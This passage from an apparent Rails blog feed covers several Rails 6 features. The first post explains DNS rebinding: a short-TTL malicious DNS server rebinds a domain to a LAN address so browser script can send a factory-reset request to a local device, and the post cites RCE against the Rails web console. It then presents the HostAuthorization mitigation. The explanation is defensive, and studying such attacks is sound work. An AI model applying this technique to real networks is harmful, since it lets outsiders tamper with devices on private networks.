       <title><![CDATA[Rails 6 adds guard against DNS Rebinding attacks]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-guard-against-dns-rebinding-attacks"/>
      <updated>2019-11-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-guard-against-dns-rebinding-attacks</id>
      <content type="html"><![CDATA[<p>In a DNS Rebinding attack, a malicious webpage runs client-side script when itis loaded, to attack endpoints within a given network.</p><h3>What is DNS Rebinding attack?</h3><p>DNS Rebinding can be summarized as follows.</p><ul><li>An unsuspecting victim is tricked into loading <code>rebinding.network</code> which isresolved by a DNS server controlled by a malicious entity.</li><li>Victims web browser sends a DNS query and gets the real IP address, say<code>24.56.78.99</code> of <code>http://rebinding.network</code>. This DNS server also sets a veryshort TTL value ( say 1 second ) on the response so that the client won'tcache this response for long.</li><li>The script on this webpage cannot attack services running in local network dueto CORS restrictions imposed by victims web browser. Instead it starts sendinga suspicious POST request to <code>http://rebinding.network/setup/reboot</code> with aJSON payload <code>{params: factory-reset}</code>.</li><li>First few requests are indeed sent to <code>24.56.78.99</code> (real IP address), withthe DNS info from the cache, but then the browser sends out a DNS query for<code>rebinding.network</code> when it observes that the cache has gone stale.</li><li>When the malicious DNS server gets the request for a second time, instead ofresponding with <code>24.56.78.99</code> (which is the real IP address of<code>rebinding.network</code>), it responds with <code>192.168.1.90</code>, an address at which, apoorly secured smart device runs.</li></ul><p>Using this exploit, an attacker is able to factory-reset a device which reliedon security provided by local network.</p><p>This attack is explained in much more detail<a href="https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325">in this blog post</a>.</p><h3>How does it affect Rails?</h3><p>Railss web console was particularly vulnerable to a Remote Code Execution (RCE)via a DNS Rebinding.</p><p><a href="http://benmmurphy.github.io/blog/2016/07/11/rails-webconsole-dns-rebinding/">In this blog post</a>,Ben Murphy goes into technical details of exploiting this vulnerability to openCalculator app (only works in OS X).</p><h3>How does Rails 6 mitigate DNS Rebinding?</h3><p>Rails mitigates DNS Rebinding attack by maintaining a whitelist of domains fromwhich it can receive requests. This is achieved with a new<a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/host_authorization.rb">HostAuthorization</a>middleware. This middleware leverages the fact that HOST request header is<a href="https://developer.mozilla.org/en-US/docs/Glossary/Forbidden_header_name">a forbidden header</a>.</p><pre><code class="language-ruby"># taken from Rails documentation# Allow requests from subdomains like `www.product.com` and# `beta1.product.com`.Rails.application.config.hosts &lt;&lt; &quot;.*\.product\.com/&quot;</code></pre><p>In the above example, Rails would render a<a href="https://github.com/rails/rails/blob/ee0d0b1220adda0ee48f67cc4340ff4d702f6ed9/actionpack/lib/action_dispatch/middleware/templates/rescues/blocked_host.html.erb">blocked host template</a>,if it receives requests from domains outside of above whitelist.</p><p>In development environment, default whitelist includes <code>0.0.0.0/0, ::0</code>(<a href="https://en.wikipedia.org/wiki/Default_route">CIDR notations for IPv4 and IPv6 default routes</a>)and <code>localhost</code>. For all other environments, config.hosts is empty and hostheader checks are not done.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveStorage::Blob#open]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activestorage-blob-open"/>
      <updated>2019-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activestorage-blob-open</id>
      <content type="html"><![CDATA[<p>Rails 6 adds<a href="https://edgeapi.rubyonrails.org/classes/ActiveStorage/Blob.html#method-i-open">ActiveStorage::Blob#open</a>which downloads a blob to a tempfile on disk and yields the tempfile.</p><pre><code class="language-ruby">&gt;&gt; blob = ActiveStorage::Blob.first=&gt; &lt;ActiveStorage::Blob id: 1, key: &quot;6qXeoibkvohP4VJiU4ytaEkH&quot;, filename: &quot;Screenshot 2019-08-26 at 10.24.40 AM.png&quot;, ..., created_at: &quot;2019-08-26 09:57:30&quot;&gt;&gt;&gt; blob.open do |tempfile|&gt;&gt;   puts tempfile.path  #do some processing&gt;&gt; end# Output: /var/folders/67/3n96myxs1rn5q_c47z7dthj80000gn/T/ActiveStorage-1-20190826-73742-mve41j.png</code></pre><h3>Processing a blob</h3><p>Let's take an example of a face detection application where the user images areuploaded. Let's assume that the images are uploaded on S3.</p><p>Before Rails 6, we will have to download the image in system's memory, processit with an image processing program and then send the processed image back tothe S3 bucket.</p><h4>The overhead</h4><p>If the processing operation is successful, the original file can be deleted fromthe system. We need to take care of a lot of uncertain events from the downloadphase till the phase when the processed image is created.</p><h4>ActiveStorage::Blob#open to the rescue</h4><p>ActiveStorage::Blob#open, abstracts away all this complications and gives us atempfile which is closed and unlinked once the block is executed.</p><p>1. <code>open</code> takes care of handling all the fanfare of getting a blob objectto a tempfile. 2. <code>open</code> takes care of the tempfile cleanup after theblock.</p><pre><code class="language-ruby">&gt; &gt; blob = ActiveStorage::Blob.first&gt; &gt; blob.open do |tempfile|&gt; &gt; tempfile #do some processing&gt; &gt; end# once the given block is executed# the tempfile is closed and unlinked=&gt; #&lt;Tempfile: (closed)&gt;</code></pre><p>By default, tempfiles are created in <code>Dir.tmpdir</code> directory, butActiveStorage::Blob#open also takes an optional argument <code>tmpdir</code> to set acustom directory for storing the tempfiles.</p><pre><code class="language-ruby">&gt; &gt; Dir.tmpdir&gt; &gt; =&gt; &quot;/var/folders/67/3n96myxs1rn5q_c47z7dthj80000gn/T&quot;&gt; &gt; blob = ActiveStorage::Blob.first&gt; &gt; blob.open(tmpdir: &quot;/desired/path/to/save&quot;) do |tempfile|&gt; &gt; puts tempfile.path #do some processing&gt; &gt; end&gt; &gt;</code></pre><p>Here is the relevant<a href="https://github.com/rails/rails/commit/9f95767979579f5761cb0d2bcccb67f3662349c5">commit</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActionMailer#email_address_with_name]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-actionmailer-email_address_with_name"/>
      <updated>2019-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-actionmailer-email_address_with_name</id>
      <content type="html"><![CDATA[<p>When using <code>ActionMailer::Base#mail</code>, if we want to display name and emailaddress of the user in email, we can pass a string in format<code>&quot;John Smith&quot; &lt;john@example.com&gt;</code> in <code>to</code>, <code>from</code> or <code>reply_to</code> options.</p><p>Before Rails 6, we had to join name and email address using string interpolationas mentioned in<a href="https://guides.rubyonrails.org/v5.2/action_mailer_basics.html#sending-email-with-name">Rails 5.2 Guides</a>and shown below.</p><pre><code class="language-ruby">  email_with_name = %(&quot;John Smith&quot; &lt;john@example.com&gt;)  mail(    to: email_with_name,    subject: 'Hey Rails 5.2!'  )</code></pre><p>Problem with string interpolation is it doesn't escape unexpected specialcharacters like quotes(&quot;) in the name.</p><p>Here's an example.</p><h3>Rails 5.2</h3><pre><code class="language-ruby">irb(main):001:0&gt; %(&quot;John P Smith&quot; &lt;john@example.com&gt;)=&gt; &quot;\&quot;John P Smith\&quot; &lt;john@example.com&gt;&quot;irb(main):002:0&gt; %('John &quot;P&quot; Smith' &lt;john@example.com&gt;)=&gt; &quot;'John \&quot;P\&quot; Smith' &lt;john@example.com&gt;&quot;</code></pre><p>Rails 6 adds<a href="https://github.com/rails/rails/pull/36454"><code>ActionMailer::Base#email_address_with_name</code></a>to join name and email address in the format <code>&quot;John Smith&quot; &lt;john@example.com&gt;</code>and take care of escaping special characters.</p><h3>Rails 6.1.0.alpha</h3><pre><code class="language-ruby">irb(main):001:0&gt; ActionMailer::Base.email_address_with_name(&quot;john@example.com&quot;, &quot;John P Smith&quot;)=&gt; &quot;John P Smith &lt;john@example.com&gt;&quot;irb(main):002:0&gt; ActionMailer::Base.email_address_with_name(&quot;john@example.com&quot;, 'John &quot;P&quot; Smith')=&gt; &quot;\&quot;John \\\&quot;P\\\&quot; Smith\&quot; &lt;john@example.com&gt;&quot;</code></pre><pre><code class="language-ruby">mail(to: email_address_with_name(&quot;john@example.com&quot;, &quot;John Smith&quot;),subject: 'Hey Rails 6!')</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/pull/36454">pull request</a>for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 raises ArgumentError if param contains colon]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-argumenterror-if-custom-param-contains-a-colon"/>
      <updated>2019-10-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-argumenterror-if-custom-param-contains-a-colon</id>
      <content type="html"><![CDATA[<p>The<a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">:param</a>option in routes is used to override default resource identifier i.e. :id.</p><p>Let's take for an example that we want product :name to be as the defaultresource identifier instead of :id while defining routes for <code>products</code>. In thiscase,<a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">:param</a>option comes handy. We will see below how we can use this option.</p><p>Before Rails 6, if<a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">resource custom param</a>contains a colon, Rails used to consider that as an extra param which should notbe the case because it sneaks in an extra param.</p><p>An <a href="https://github.com/rails/rails/issues/30467">issue</a> was raised in Aug, 2017which was later fixed in February this year.</p><p>So, now Rails 6 raises <code>ArgumentError</code> if a<a href="https://guides.rubyonrails.org/routing.html#overriding-named-route-parameters">resource custom param</a>contains a colon(:).</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's create routes for <code>products</code> with custom param as <code>name/:pzn</code>.</p><pre><code class="language-ruby">&gt; &gt; Rails.application.routes.draw do&gt; &gt; resources :products, param: 'name/:pzn'&gt; &gt; end&gt; &gt;</code></pre><pre><code class="language-plaintext">\$ rake routes | grep productsproducts GET /products(.:format) products#indexPOST /products(.:format) products#createnew_product GET /products/new(.:format) products#newedit_product GET /products/:name/:pzn/edit(.:format) products#editproduct GET /products/:name/:pzn(.:format) products#showPATCH /products/:name/:pzn(.:format) products#updatePUT /products/:name/:pzn(.:format) products#updateDELETE /products/:name/:pzn(.:format) products#destroy</code></pre><p>As we can see, Rails also considers <code>:pzn</code> as a parameter.</p><p>Now let's see how it works in Rails 6.</p><h4>Rails 6.0.0.rc1</h4><pre><code class="language-ruby">&gt; &gt; Rails.application.routes.draw do&gt; &gt; resources :products, param: 'name/:pzn'&gt; &gt; end&gt; &gt;</code></pre><pre><code class="language-plaintext">\$ rake routes | grep productsrake aborted!ArgumentError: :param option can't contain colons/Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1149:in `initialize' /Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1472:in `new'/Users/amit/.rvm/gems/ruby-2.6.3/gems/actionpack-6.0.0.rc1/lib/action_dispatch/routing/mapper.rb:1472:in `block in resources'.........</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/issues/30467">issue</a> andthe <a href="https://github.com/rails/rails/pull/35236">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 introduces new code loader called Zeitwerk]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-introduces-new-code-loader-called-zeitwerk"/>
      <updated>2019-10-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-introduces-new-code-loader-called-zeitwerk</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/fxn/zeitwerk">Zeitwerk</a> is the new code loader that<a href="https://weblog.rubyonrails.org/2019/2/22/zeitwerk-integration-in-rails-6-beta-2#autoloading-modes">comes with Rails 6 by default</a>.In addition to providing<a href="https://guides.rubyonrails.org/autoloading_and_reloading_constants.html">autoloading, eager loading, and reloading capabilities</a>,it also improves the classical code loader by being efficient and thread safe.According to the author of Zeitwerk, <a href="https://twitter.com/fxn">Xavier Noria</a>,one of the main motivations for writing Zeitwerk was to keep code DRY and toremove the brittle <code>require</code> calls.</p><p>Zeitwerk is available as a gem with no additional dependencies. It means anyregular Ruby project can use Zeitwerk.</p><h3>How to use Zeitwerk</h3><p>Zeitwerk is baked in a Rails 6 project, thanks to the<a href="https://github.com/rails/rails/blob/bfc9065d58508fb19dd1a4170406604dd3b3234a/activesupport/lib/active_support/dependencies/zeitwerk_integration.rb">Zeitwerk-Rails integration</a>.For a non-Rails project, adding the following into the project's entry pointsets up Zeitwerk.</p><pre><code class="language-ruby">loader = Zeitwerk::Loader.newloader.push_dir(...)loader.setup</code></pre><p>For gem maintainers, Zeitwerk provides the handy <code>.for_gem</code> utility method</p><p>The following example from Zeitwerk documentation illustrates the usage of<code>Zeitwerk.for_gem</code> method.</p><pre><code class="language-ruby">#lib/my_gem.rb (main file)require &quot;zeitwerk&quot;loader = Zeitwerk::Loader.for_gemloader.setupmodule MyGem  # Since the setup has been performed, at this point we are already  # able to reference project constants, in this case MyGem::MyLogger.  include MyLoggerend</code></pre><h3>How does Zeitwerk work?</h3><p>Before we look into Zeitwerk's internals, the following section provides a quickrefresher on constant-resolution in Ruby and how classical code loader of Railsworks.</p><p>Ruby's constant resolution looks for a constant in the following places.</p><ul><li>In each entry of Module.nesting</li><li>In each entry of Module.ancestors</li></ul><p>It triggers 'constant_missing' callback when it can't find the constant.</p><p>Ruby used to look for constants in Object.ancestors as well, but<a href="https://github.com/ruby/ruby/commit/44a2576f798b07139adde2d279e48fdbe71a0148">that seems not the case anymore</a>.An in-depth explanation of constant resolution can be found<a href="https://cirw.in/blog/constant-lookup.html">at Conrad Irwin's blog</a>.</p><h5>Classical Code Loader in Rails</h5><p>Classical code loader (code loader in Rails version &lt; 6.0) achieves autoloadingby overriding<a href="https://docs.ruby-lang.org/en/2.5.0/Module.html#method-i-const_missing">Module#const_missing</a>and loads the missing constant without the need for an explicit require call aslong as the code follows certain conventions.</p><ul><li>The file should be within a directory inActiveSupport::Dependencies.autoload_paths</li><li>A file should be named after the class, i.e Admin::RoutesController =&gt;admin/routes_controller.rb</li></ul><h5>Zeitwerk Mode</h5><p>Zeitwerk takes an entirely different approach in autoloading by registeringconstants to be autoloaded by Ruby.</p><p>Consider the following configuration in which Zeitwerk manages <code>lib</code> directoryand <code>lib</code> has <code>automobile.rb</code> file.</p><pre><code class="language-ruby">loader.push_dir('./lib')</code></pre><p>Zeitwerk then uses<a href="https://docs.ruby-lang.org/en/2.5.0/Module.html#method-i-autoload">Module.autoload</a>to tell Ruby that &quot;Automobile&quot; can be found in &quot;lib/automobile.rb&quot;.</p><pre><code class="language-ruby">autoload &quot;Automobile&quot;, &quot;lib/automobile.rb&quot;</code></pre><p>Unlike classical loader, Zeitwerk takes module nesting into account whileloading constants by leveraging the new Tracepoint API to go look for constantsdefined in subdirectories when a new class or module is defined.</p><p>Let us look at an example to understand this better.</p><pre><code class="language-ruby">class Automobile  # =&gt; Tracepoint hook triggers here.  # include Engineend</code></pre><p>When<a href="https://github.com/fxn/zeitwerk/blob/86064aba0c6e218c8bcc235b30c210a86c7c6ef8/lib/zeitwerk/explicit_namespace.rb#L78">the tracepoint hook</a>triggers, Zeitwerk checks for an <code>automobile</code> directory in the same level asautomobile.rb and sets up Module.autoload for that directory and all the files(in this case ./automobile/engine.rb) within that directory.</p><h3>Conclusion</h3><p>Previously in Rails, we had a code loader that was riddled with gotchas andstruggled to be thread safe. Zeitwerk does a better job by leveraging the newRuby standard API and matches Ruby's semantics for constants.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveSupport::ActionableError]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-active-support-actionable-error"/>
      <updated>2019-10-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-active-support-actionable-error</id>
      <content type="html"><![CDATA[<p>When working in a team on a Rails application, we often bump into<code>PendingMigrationError</code> or other errors that need us to run a rails command,rake task etc.</p><p>Rails introduced a way to resolve such frequent errors in development from errorpage itself.</p><p>Rails 6 added<a href="https://github.com/rails/rails/pull/34788"><code>ActiveSupport::ActionableError</code></a>module to define actions we want perform on errors, right from the error page.</p><p>For example, this is how <code>PendingMigrationError</code> page looks like in Rails 6.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/rails-6.png" alt="How Actionable error looks like in Rails 6"></p><p>By default, a button is added on error screen that says <em>Run pendingmigrations</em>. Clicking on this button would dispatch <code>rails db:migrate</code> action.Page will reload once migrations run successfully.</p><p>We can also define custom actions to execute on errors.</p><h3>How to define actions on error?</h3><p>We need to include <code>ActiveSupport::ActionableError</code> module in our error class.We can monkey patch an existing error class or define custom error class.</p><p><code>#action</code> api is provided to define actions on error. First argument in<code>#action</code> is name of the action. This string would be displayed on the button onerror page. Second argument is a block where we can write commands or code tofix the error.</p><p>Let's take an example of seeding posts data from controller, if posts notalready present.</p><pre><code class="language-ruby"># app/controllers/posts_controller.rbclass PostsController &lt; ApplicationControllerdef index@posts = Post.allif @posts.empty?raise PostsMissingErrorendendend</code></pre><pre><code class="language-ruby"># app/errors/posts_missing_error.rbclass PostsMissingError &lt; StandardErrorinclude ActiveSupport::ActionableErroraction &quot;seed posts data&quot; doRails::Command.invoke 'posts:seed'endend</code></pre><pre><code class="language-ruby"># lib/tasks/posts.rakenamespace :posts dodesc 'posts seed task'task :seed doPost.create(title: 'First Post')endend</code></pre><pre><code class="language-ruby"># app/views/posts/index.html.erb&lt;% @posts.each do |post| %&gt;&lt;%= post.title %&gt;&lt;% end %&gt;</code></pre><p>Let's check <code>/posts</code> (<code>posts#index</code> action) when no posts are present. We wouldget an error page with an action button on it as shown below.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/posts-missing-error.png" alt="Actionable error - seed posts data"></p><p>Clicking on <em>seed posts data</em> action button will run our rake task and createposts. Rails will automatically reload <code>/posts</code> after running rake task.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/posts-index.png" alt="Posts index page"></p><p><a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb"><code>ActionDispatch::ActionableExceptions</code></a>middleware takes care of invoking actions from error page.<code>ActionableExceptions</code> middleware dispatches action to <code>ActionableError</code> andredirects back when action block has successfully run. Action buttons are addedon error page from<a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/templates/rescues/_actions.html.erb">this middleware template</a>.</p><p>Checkout the <a href="https://github.com/rails/rails/pull/34788">pull request</a> for moreinformation on actionable error.</p>]]></content>
    </entry><entry>
       <title><![CDATA[This is how our workspace looks like]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/this-is-how-our-workspace-looks-like"/>
      <updated>2019-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/this-is-how-our-workspace-looks-like</id>
      <content type="html"><![CDATA[<p>BigBinary has been remote and flexible since the start, and it's one of the bestthings a company can offer. You don't need to spend hours commuting, you canwork when you feel productive. Working remotely also means that you have theflexibility of working from Starbucks, from a library or from your home. You canset up your own workspace at home and still have the office-like feeling.</p><p>We recently got a chance to see workspaces of our colleagues and everyone sharedphotos of environments they work in on Slack and it was fun seeing everyone'sdesk and the setup they have. We thought it would be fun to share a peek at thehome offices we have. Here we go.</p><h2>Akhil Gautam</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpeg" alt="BigBinary Remote Workspace"></p><h2>Amit Choudhary</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Chimed Palden</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Chirag Shah</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"></p><h2>Ershad Kunnakkadan</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpeg" alt="BigBinary Remote Workspace"></p><h2>Mohit Natoo</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Navaneeth PK</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.png" alt="BigBinary Remote Workspace"></p><h2>Neeraj Singh</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"></p><h2>Nitin Kalasannavar</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Paras Bansal</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Pranav Raj</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Prathamesh Sonpatki</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Rahul Mahale</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Rishi Mohan</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_3.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_4.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_5.jpg" alt="BigBinary Remote Workspace"></p><h2>Shibin Madassery</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Sony Mathew</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Sunil Kumar</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Tyler and Naiara</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Unnikrishnan KP</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Vishal Telangre</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 add_foreign_key & remove_foreign_key SQLite3]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-add_foreign_key-and-remove_foreign_key-for-sqlite3"/>
      <updated>2019-09-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-add_foreign_key-and-remove_foreign_key-for-sqlite3</id>
      <content type="html"><![CDATA[<p>Rails provides<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>to add foreign key constraint for a column on a table.</p><p>It also provides<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>to remove the foreign key constraint.</p><p>Before Rails 6,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>were not supported for SQLite3.</p><p>Rails 6 now adds this support. Now, we can create and remove foreign keyconstraints using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>in SQLite3.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>We have two tables named as <code>orders</code> and <code>users</code>. Now, let's add foreign keyconstraint of <code>users</code> in <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and then try removing it using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class AddUserReferenceToOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     add_column :orders, :user_id, :integer&gt;&gt;     add_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; AddUserReferenceToOrders.new.change-- add_column(:orders, :user_id, :integer)   (1.2ms)  ALTER TABLE &quot;orders&quot; ADD &quot;user_id&quot; integer   -&gt; 0.0058s-- add_foreign_key(:orders, :users)   -&gt; 0.0000s=&gt; nil&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   -&gt; 0.0001s=&gt; nil</code></pre><p>We can see that<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>are ignored by <code>Rails 5.2</code> with SQLite3.</p><h4>Rails 6.0.0.rc1</h4><p>We have two tables named as <code>orders</code> and <code>users</code>. Now, let's add foreign keyconstraint of <code>users</code> in <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class AddUserReferenceToOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     add_column :orders, :user_id, :integer&gt;&gt;     add_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; AddUserReferenceToOrders.new.change-- add_column(:orders, :user_id, :integer)   (1.0ms)  SELECT sqlite_version(*)   (2.9ms)  ALTER TABLE &quot;orders&quot; ADD &quot;user_id&quot; integer   -&gt; 0.0091s-- add_foreign_key(:orders, :users)   (0.0ms)  begin transaction   (0.1ms)  PRAGMA foreign_keys   (0.1ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.1ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   (0.3ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL, CONSTRAINT &quot;fk_rails_f868b47f6a&quot;FOREIGN KEY (&quot;user_id&quot;)  REFERENCES &quot;users&quot; (&quot;id&quot;))   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.6ms)  commit transaction   -&gt; 0.0083s=&gt; []&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; 